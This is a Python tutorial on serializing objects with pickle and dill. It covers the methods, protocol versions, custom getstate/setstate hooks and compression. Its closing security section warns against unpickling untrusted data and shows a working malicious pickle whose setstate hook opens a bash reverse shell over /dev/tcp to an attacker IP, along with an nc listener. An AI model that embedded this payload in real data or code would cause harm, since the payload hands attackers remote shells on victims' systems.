Movatterモバイル変換


[0]ホーム

URL:


— FREE Email Series —

🐍 Python Tricks 💌

Python Tricks Dictionary Merge

🔒 No spam. Unsubscribe any time.

Browse TopicsGuided Learning Paths
Basics Intermediate Advanced
apibest-practicescareercommunitydatabasesdata-sciencedata-structuresdata-vizdevopsdjangodockereditorsflaskfront-endgamedevguimachine-learningnumpyprojectspythontestingtoolsweb-devweb-scraping

Table of Contents

Recommended Video Course
Serializing Objects With the Python pickle Module

The Python pickle Module: How to Persist Objects in Python

The Python pickle Module: How to Persist Objects in Python

byDavide Mastromatteointermediatepython

Table of Contents

Remove ads

Watch Now This tutorial has a related video course created by the Real Python team. Watch it together with the written tutorial to deepen your understanding:Serializing Objects With the Python pickle Module

As a developer, you may sometimes need to send complex object hierarchies over a network or save the internal state of your objects to a disk or database for later use. To accomplish this, you can use a process calledserialization, which is fully supported by the standard library thanks to the Pythonpickle module.

In this tutorial, you’ll learn:

  • What it means toserialize anddeserialize an object
  • Whichmodules you can use to serialize objects in Python
  • Which kinds of objects can be serialized with the Pythonpickle module
  • How to use the Pythonpickle module to serializeobject hierarchies
  • What therisks are when deserializing an object from an untrusted source

Let’s get pickling!

Free Bonus:5 Thoughts On Python Mastery, a free course for Python developers that shows you the roadmap and the mindset you’ll need to take your Python skills to the next level.

Serialization in Python

Theserialization process is a way to convert a data structure into a linear form that can be stored or transmitted over a network.

In Python, serialization allows you to take a complex object structure and transform it into a stream of bytes that can be saved to a disk or sent over a network. You may also see this process referred to asmarshalling. The reverse process, which takes a stream of bytes and converts it back into a data structure, is calleddeserialization orunmarshalling.

Serialization can be used in a lot of different situations. One of the most common uses is saving the state of a neural network after the training phase so that you can use it later without having to redo the training.

Python offers three differentmodules in the standard library that allow you to serialize and deserialize objects:

  1. Themarshal module
  2. Thejson module
  3. Thepickle module

In addition, Python supportsXML, which you can also use to serialize objects.

Themarshal module is the oldest of the three listed above. It exists mainly to read and write the compiled bytecode of Python modules, or the.pyc files you get when the interpreterimports a Python module. So, even though you can usemarshal to serialize some of your objects, it’s not recommended.

Thejson module is the newest of the three. It allows you to work with standard JSON files. JSON is a very convenient and widely used format for data exchange.

There are several reasons to choose theJSON format: It’shuman readable andlanguage independent, and it’s lighter than XML. With thejson module, you can serialize and deserialize several standard Python types:

The Pythonpickle module is another way to serialize and deserialize objects in Python. It differs from thejson module in that it serializes objects in a binary format, which means the result is not human readable. However, it’s also faster and it works with many more Python types right out of the box, including your custom-defined objects.

Note: From now on, you’ll see the termspickling andunpickling used to refer to serializing and deserializing with the Pythonpickle module.

So, you have several different ways to serialize and deserialize objects in Python. But which one should you use? The short answer is that there’s no one-size-fits-all solution. It all depends on your use case.

Here are three general guidelines for deciding which approach to use:

  1. Don’t use themarshal module. It’s used mainly by the interpreter, and the official documentation warns that the Python maintainers may modify the format in backward-incompatible ways.

  2. Thejson module and XML are good choices if you need interoperability with different languages or a human-readable format.

  3. The Pythonpickle module is a better choice for all the remaining use cases. If you don’t need a human-readable format or a standard interoperable format, or if you need to serialize custom objects, then go withpickle.

Inside the Pythonpickle Module

The Pythonpickle module basically consists of four methods:

  1. pickle.dump(obj, file, protocol=None, *, fix_imports=True, buffer_callback=None)
  2. pickle.dumps(obj, protocol=None, *, fix_imports=True, buffer_callback=None)
  3. pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
  4. pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)

The first two methods are used during the pickling process, and the other two are used during unpickling. The only difference betweendump() anddumps() is that the first creates a file containing the serialization result, whereas the second returns a string.

To differentiatedumps() fromdump(), it’s helpful to remember that thes at the end of the function name stands forstring. The same concept also applies toload() andloads(): The first one reads a file to start the unpickling process, and the second one operates on a string.

Consider the following example. Say you have a custom-defined class namedexample_class with several different attributes, each of a different type:

  • a_number
  • a_string
  • a_dictionary
  • a_list
  • a_tuple

The example below shows how you can instantiate the class and pickle the instance to get a plain string. After pickling the class, you can change the value of its attributes without affecting the pickled string. You can then unpickle the pickled string in anothervariable, restoring an exact copy of the previously pickled class:

Python
# pickling.pyimportpickleclassexample_class:a_number=35a_string="hey"a_list=[1,2,3]a_dict={"first":"a","second":2,"third":[1,2,3]}a_tuple=(22,23)my_object=example_class()my_pickled_object=pickle.dumps(my_object)# Pickling the objectprint(f"This is my pickled object:\n{my_pickled_object}\n")my_object.a_dict=Nonemy_unpickled_object=pickle.loads(my_pickled_object)# Unpickling the objectprint(f"This is a_dict of the unpickled object:\n{my_unpickled_object.a_dict}\n")

In the example above, you create several different objects and serialize them withpickle. This produces a single string with the serialized result:

Shell
$pythonpickling.pyThis is my pickled object:b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'This is a_dict of the unpickled object:{'first': 'a', 'second': 2, 'third': [1, 2, 3]}

The pickling process ends correctly, storing your entire instance in this string:b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.' After the pickling process ends, you modify your original object by setting the attributea_dict toNone.

Finally, you unpickle the string to a completely new instance. What you get is adeep copy of your original object structure from the time that the pickling process began.

Protocol Formats of the Pythonpickle Module

As mentioned above, thepickle module is Python-specific, and the result of a pickling process can be read only by another Python program. But even if you’re working with Python, it’s important to know that thepickle module has evolved over time.

This means that if you’ve pickled an object with a specific version of Python, then you may not be able to unpickle it with an older version. The compatibility depends on the protocol version that you used for the pickling process.

There are currently six different protocols that the Pythonpickle module can use. The higher the protocol version, the more recent the Python interpreter needs to be for unpickling.

  1. Protocol version 0 was the first version. Unlike later protocols, it’s human readable.
  2. Protocol version 1 was the first binary format.
  3. Protocol version 2 was introduced in Python 2.3.
  4. Protocol version 3 was added in Python 3.0. It can’t be unpickled by Python 2.x.
  5. Protocol version 4 was added in Python 3.4. It features support for a wider range of object sizes and types and is the default protocol starting withPython 3.8.
  6. Protocol version 5 was added in Python 3.8. It features support forout-of-band data and improved speeds for in-band data.

Note: Newer versions of the protocol offer more features and improvements but are limited to higher versions of the interpreter. Be sure to consider this when choosing which protocol to use.

To identify the highest protocol that your interpreter supports, you can check the value of thepickle.HIGHEST_PROTOCOL attribute.

To choose a specific protocol, you need to specify the protocol version when you invokeload(),loads(),dump() ordumps(). If you don’t specify a protocol, then your interpreter will use the default version specified in thepickle.DEFAULT_PROTOCOL attribute.

Picklable and Unpicklable Types

You’ve already learned that the Pythonpickle module can serialize many more types than thejson module. However, not everything is picklable. The list of unpicklable objects includes database connections, opened network sockets, running threads, and others.

If you find yourself faced with an unpicklable object, then there are a couple of things that you can do. The first option is to use a third-party library such asdill.

Thedill module extends the capabilities ofpickle. According to theofficial documentation, it lets you serialize less common types likefunctions withyields,nested functions,lambdas, and many others.

To test this module, you can try to pickle alambda function:

Python
# pickling_error.pyimportpicklesquare=lambdax:x*xmy_pickle=pickle.dumps(square)

If you try to run this program, then you will get an exception because the Pythonpickle module can’t serialize alambda function:

Shell
$pythonpickling_error.pyTraceback (most recent call last):  File "pickling_error.py", line 6, in <module>    my_pickle = pickle.dumps(square)_pickle.PicklingError: Can't pickle <function <lambda> at 0x10cd52cb0>: attribute lookup <lambda> on __main__ failed

Now try replacing the Pythonpickle module withdill to see if there’s any difference:

Python
# pickling_dill.pyimportdillsquare=lambdax:x*xmy_pickle=dill.dumps(square)print(my_pickle)

If you run this code, then you’ll see that thedill module serializes thelambda without returning an error:

Shell
$pythonpickling_dill.pyb'\x80\x03cdill._dill\n_create_function\nq\x00(cdill._dill\n_load_type\nq\x01X\x08\x00\x00\x00CodeTypeq\x02\x85q\x03Rq\x04(K\x01K\x00K\x01K\x02KCC\x08|\x00|\x00\x14\x00S\x00q\x05N\x85q\x06)X\x01\x00\x00\x00xq\x07\x85q\x08X\x10\x00\x00\x00pickling_dill.pyq\tX\t\x00\x00\x00squareq\nK\x04C\x00q\x0b))tq\x0cRq\rc__builtin__\n__main__\nh\nNN}q\x0eNtq\x0fRq\x10.'

Another interesting feature ofdill is that it can even serialize an entire interpreter session. Here’s an example:

Python
>>>square=lambdax:x*x>>>a=square(35)>>>importmath>>>b=math.sqrt(484)>>>importdill>>>dill.dump_session('test.pkl')>>>exit()

In this example, you start the interpreter,import a module, and define alambda function along with a couple of other variables. You then import thedill module and invokedump_session() to serialize the entire session.

If everything goes okay, then you should get atest.pkl file in your current directory:

Shell
$lstest.pkl4 -rw-r--r--@ 1 dave  staff  439 Feb  3 10:52 test.pkl

Now you can start a new instance of the interpreter and load thetest.pkl file to restore your last session:

Python
>>>globals().items()dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>)])>>>importdill>>>dill.load_session('test.pkl')>>>globals().items()dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>), ('dill', <module 'dill' from '/usr/local/lib/python3.7/site-packages/dill/__init__.py'>), ('square', <function <lambda> at 0x10a013a70>), ('a', 1225), ('math', <module 'math' from '/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/lib-dynload/math.cpython-37m-darwin.so'>), ('b', 22.0)])>>>a1225>>>b22.0>>>square<function <lambda> at 0x10a013a70>

The firstglobals().items() statement demonstrates that the interpreter is in the initial state. This means that you need to import thedill module and callload_session() to restore your serialized interpreter session.

Note: Before you usedill instead ofpickle, keep in mind thatdill is not included in the standard library of the Python interpreter and is typically slower thanpickle.

Even thoughdill lets you serialize a wider range of objects thanpickle, it can’t solve every serialization problem that you may have. If you need to serialize an object that contains a database connection, for example, then you’re in for a tough time because it’s an unserializable object even fordill.

So, how can you solve this problem?

The solution in this case is to exclude the object from the serialization process and toreinitialize the connection after the object is deserialized.

You can use__getstate__() to define what should be included in the pickling process. This method allows you to specify what you want to pickle. If you don’t override__getstate__(), then the default instance’s.__dict__ will be used.

In the following example, you’ll see how you can define a class with several attributes and exclude one attribute from serialization with__getstate()__:

Python
# custom_pickling.pyimportpickleclassfoobar:def__init__(self):self.a=35self.b="test"self.c=lambdax:x*xdef__getstate__(self):attributes=self.__dict__.copy()delattributes['c']returnattributesmy_foobar_instance=foobar()my_pickle_string=pickle.dumps(my_foobar_instance)my_new_instance=pickle.loads(my_pickle_string)print(my_new_instance.__dict__)

In this example, you create an object with three attributes. Since one attribute is alambda, the object is unpicklable with the standardpickle module.

To address this issue, you specify what to pickle with__getstate__(). You first clone the entire__dict__ of the instance to have all the attributes defined in the class, and then you manually remove the unpicklablec attribute.

If you run this example and then deserialize the object, then you’ll see that the new instance doesn’t contain thec attribute:

Shell
$pythoncustom_pickling.py{'a': 35, 'b': 'test'}

But what if you wanted to do some additional initializations while unpickling, say by adding the excludedc object back to the deserialized instance? You can accomplish this with__setstate__():

Python
# custom_unpickling.pyimportpickleclassfoobar:def__init__(self):self.a=35self.b="test"self.c=lambdax:x*xdef__getstate__(self):attributes=self.__dict__.copy()delattributes['c']returnattributesdef__setstate__(self,state):self.__dict__=stateself.c=lambdax:x*xmy_foobar_instance=foobar()my_pickle_string=pickle.dumps(my_foobar_instance)my_new_instance=pickle.loads(my_pickle_string)print(my_new_instance.__dict__)

By passing the excludedc object to__setstate__(), you ensure that it appears in the.__dict__ of the unpickled string.

Compression of Pickled Objects

Although thepickle data format is a compact binary representation of an object structure, you can still optimize your pickled string by compressing it withbzip2 orgzip.

Tocompress a pickled string withbzip2, you can use thebz2 module provided in the standard library.

In the following example, you’ll take astring, pickle it, and then compress it using thebz2 library:

Python
>>>importpickle>>>importbz2>>>my_string="""Per me si va ne la città dolente,...per me si va ne l'etterno dolore,...per me si va tra la perduta gente....Giustizia mosse il mio alto fattore:...fecemi la divina podestate,...la somma sapienza e 'l primo amore;...dinanzi a me non fuor cose create...se non etterne, e io etterno duro....Lasciate ogne speranza, voi ch'intrate.""">>>pickled=pickle.dumps(my_string)>>>compressed=bz2.compress(pickled)>>>len(my_string)315>>>len(compressed)259

When using compression, bear in mind that smaller files come at the cost of a slower process.

Security Concerns With the Pythonpickle Module

You now know how to use thepickle module to serialize and deserialize objects in Python. The serialization process is very convenient when you need to save your object’s state to disk or to transmit it over a network.

However, there’s one more thing you need to know about the Pythonpickle module: It’s not secure. Do you remember the discussion of__setstate__()? Well, that method is great for doing more initialization while unpickling, but it can also be used to execute arbitrary code during the unpickling process!

So, what can you do to reduce this risk?

Sadly, not much. The rule of thumb is tonever unpickle data that comes from an untrusted source or is transmitted over an insecure network. In order to preventman-in-the-middle attacks, it’s a good idea to use libraries such ashmac to sign the data and ensure it hasn’t been tampered with.

The following example illustrates how unpickling a tampered pickle could expose your system to attackers, even giving them a working remote shell:

Python
# remote.pyimportpickleimportosclassfoobar:def__init__(self):passdef__getstate__(self):returnself.__dict__def__setstate__(self,state):# The attack is from 192.168.1.10# The attacker is listening on port 8080os.system('/bin/bash -c"/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1"')my_foobar=foobar()my_pickle=pickle.dumps(my_foobar)my_unpickle=pickle.loads(my_pickle)

In this example, the unpickling process executes__setstate__(), which executes a Bash command to open a remote shell to the192.168.1.10 machine on port8080.

Here’s how you can safely test this script on your Mac or your Linux box. First, open theterminal and use thenc command to listen for a connection to port 8080:

Shell
$nc-l8080

This will be theattacker terminal. If everything works, then the command will seem to hang.

Next, open another terminal on the same computer (or on any other computer on the network) and execute the Python code above for unpickling the malicious code. Be sure to change theIP address in the code to your attacking terminal’s IP address. In my example, the attacker’s IP address is192.168.1.10.

By executing this code, the victim will expose a shell to the attacker:

Shell
$pythonremote.py

If everything works, a Bash shell will appear on the attacking console. This console can now operate directly on the attacked system:

Shell
$nc-l8080bash: no job control in this shellThe default interactive shell is now zsh.To update your account to use zsh, please run `chsh -s /bin/zsh`.For more details, please visit https://support.apple.com/kb/HT208050.bash-3.2$

So, let me repeat this critical point once again:Do not use thepickle module to deserialize objects from untrusted sources!

Conclusion

You now know how to use the Pythonpickle module to convert an object hierarchy to a stream of bytes that can be saved to a disk or transmitted over a network. You also know that the deserialization process in Python must be used with care since unpickling something that comes from an untrusted source can be extremely dangerous.

In this tutorial, you’ve learned:

  • What it means toserialize anddeserialize an object
  • Whichmodules you can use to serialize objects in Python
  • Which kinds of objects can be serialized with the Pythonpickle module
  • How to use the Pythonpickle module to serializeobject hierarchies
  • What therisks are of unpickling from an untrusted source

With this knowledge, you’re well equipped to persist your objects using the Pythonpickle module. As an added bonus, you’re ready to explain the dangers of deserializing malicious pickles to your friends and coworkers.

If you have any questions, then leave a comment down below or contact me onTwitter!

Watch Now This tutorial has a related video course created by the Real Python team. Watch it together with the written tutorial to deepen your understanding:Serializing Objects With the Python pickle Module

🐍 Python Tricks 💌

Get a short & sweetPython Trick delivered to your inbox every couple of days. No spam ever. Unsubscribe any time. Curated by the Real Python team.

Python Tricks Dictionary Merge

AboutDavide Mastromatteo

Developer and editor of “the Python Corner". Blood donor, Apple user, Python and Swift addicted.NFL, Rugby and Chess lover. Constantly hungry and foolish.

» More about Davide

Each tutorial at Real Python is created by a team of developers so that it meets our high quality standards. The team members who worked on this tutorial are:

MasterReal-World Python Skills With Unlimited Access to Real Python

Locked learning resources

Join us and get access to thousands of tutorials, hands-on video courses, and a community of expert Pythonistas:

Level Up Your Python Skills »

MasterReal-World Python Skills
With Unlimited Access to Real Python

Locked learning resources

Join us and get access to thousands of tutorials, hands-on video courses, and a community of expert Pythonistas:

Level Up Your Python Skills »

What Do You Think?

Rate this article:

What’s your #1 takeaway or favorite thing you learned? How are you going to put your newfound skills to use? Leave a comment below and let us know.

Commenting Tips: The most useful comments are those written with the goal of learning from or helping out other students.Get tips for asking good questions andget answers to common questions in our support portal.


Looking for a real-time conversation? Visit theReal Python Community Chat or join the next“Office Hours” Live Q&A Session. Happy Pythoning!

Keep Learning

Related Topics:intermediatepython

Recommended Video Course:Serializing Objects With the Python pickle Module

Related Tutorials:

Keep reading Real Python by creating a free account or signing in:

Already have an account?Sign-In

Almost there! Complete this form and click the button below to gain instant access:

Python Logo

5 Thoughts On Python Mastery

🔒 No spam. We take your privacy seriously.


[8]ページ先頭

©2009-2025 Movatter.jp